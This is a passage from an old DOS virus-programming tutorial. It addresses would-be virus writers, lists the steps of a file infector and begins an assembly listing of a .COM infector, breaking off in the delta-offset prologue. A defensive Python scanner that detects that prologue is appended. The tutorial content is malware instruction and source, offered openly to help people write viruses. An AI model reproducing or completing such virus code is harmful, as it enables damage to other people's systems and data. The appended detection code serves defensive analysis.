virpgm01 - Virus programming(basics#1-This section is...

Virus programming (basics) #1...
-----------------------------------------------------------------
This section is dedicated to those who would like to write a virus, but don't have the knowledge to do so. First of all, writing a virus is no big deal. It is an easy project, but one which requires some basic programming skills, and the desire to write a virus! If either of these is missing, writing a virus would be tedious indeed! Well, if you meet these requisites, keep reading this article.

...
        JE READ
        JNE FUCK_YOU!
READ:

The survival of a virus is based on its ability to reproduce. "So how the fuck do I make a program reproduce?", you might ask. Simple, by getting it to copy itself to other files.

...

The functional logic of a virus is as follows:

1- Search for a file to infect
2- Open the file to see if it is infected
3- If infected, search for another file
4- Else, infect the file
5- Return control to the host program.

The following is an example of a simple virus:

;****************************************************************
;                  START OF THE EXAMPLE:
;****************************************************************
;Warning, this example is a (piece of shit?)
; - The virus does not test for prior infection
; - it searches only for the first .COM file in the current
;   directory
;
; Careful when executing this file, since the first time it's
; executed it will search for and infect the first file in the
; directory. If we later run the newly infected file, it will find
; the first file in its directory, itself. Thus, it will re-infect
; itself over and over.
;===================CODE=========================================
;(The variables in a .COM file are relative to offset 100h).

codigo  segment 'code'
        org 100h                ;Organize all the code starting
                                ; from offset 100h
        assume cs:codigo,ds:codigo,es:codigo    ;Define the use of the
                                                ;segments

start   proc far                ;Start the routine
COMIENZO:
        push cs                 ;Store CS
        push cs                 ;Store CS
                                ; once again.
        pop ds                  ;Bring DS out from stack
        pop es                  ;Bring ES out from stack

        call falso_proc         ;Call proc. so that its
                                ; address is placed in the stack
falso_proc      proc near
falso_proc      endp

        pop bp                  ;BP<== Proc. address.
        sub bp, 107h            ;BP<== BP - Previous directory

;This is done to take the variables relative to BP, since the
;infection displaces the variables at exactly the length of the
; file. At the first infection, instruction "SUB BP, 107h" is
; 107h, so that the contents of BP is 0; when I call a variable
; with "BP+VARIABLE" the value of the variable's address is not
; modified. When I load it, for example, from a 100h byte
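
From the defender's side, the CALL / POP BP / SUB BP, 107h sequence in the listing is a recognizable byte pattern that legitimate .COM programs rarely need. The scanner below is an added example, not part of the original article; it generalizes the match to any 16-bit register, and the function name and sample byte strings are constructed for illustration.

```python
import struct

COM_BASE = 0x100  # DOS loads a .COM image at offset 100h
REG16 = ("ax", "cx", "dx", "bx", "sp", "bp", "si", "di")

def find_delta_offset(image: bytes):
    """Find CALL $+3 / POP r16 / SUB r16, imm16 sequences in a .COM image.

    Returns one dict per hit: file offset of the CALL, the register, the
    subtracted constant, and the resulting delta (0 when the code sits
    where it was assembled, non-zero when it has been displaced).
    Limitation: only the 81h /5 encoding of SUB is matched.
    """
    hits = []
    pos = image.find(b"\xE8\x00\x00")            # CALL rel16, displacement 0
    while pos != -1:
        seq = image[pos + 3:pos + 8]             # POP, 81h, ModRM, imm16
        if len(seq) == 5 and 0x58 <= seq[0] <= 0x5F:
            reg = seq[0] - 0x58                  # POP r16 is 58h + register
            if seq[1] == 0x81 and seq[2] == (0xE8 | reg):   # SUB r16, imm16
                imm = struct.unpack_from("<H", seq, 3)[0]
                ret_addr = COM_BASE + pos + 3    # value the CALL pushed
                hits.append({
                    "offset": pos,
                    "register": REG16[reg],
                    "constant": imm,
                    "delta": (ret_addr - imm) & 0xFFFF,
                })
        pos = image.find(b"\xE8\x00\x00", pos + 1)
    return hits

# Constructed samples (not real files).
# Bytes of the prologue shown in the listing: push cs / push cs / pop ds /
# pop es / call next / pop bp / sub bp,107h
PROLOGUE = bytes.fromhex("0e0e1f07e800005d81ed0701")
# Harmless DOS "print string and exit" program.
BENIGN = bytes.fromhex("b409ba0901cd21cd20") + b"hi$"
# The same prologue located 300h bytes further into an image (NOP padding).
DISPLACED = b"\x90" * 0x300 + PROLOGUE

if __name__ == "__main__":
    for name, img in (("prologue", PROLOGUE), ("benign", BENIGN),
                      ("displaced", DISPLACED)):
        print(name, find_delta_offset(img))
```

A hit is a reason to triage the file further, not a verdict: position-independent code in packers and some loaders uses the same idiom.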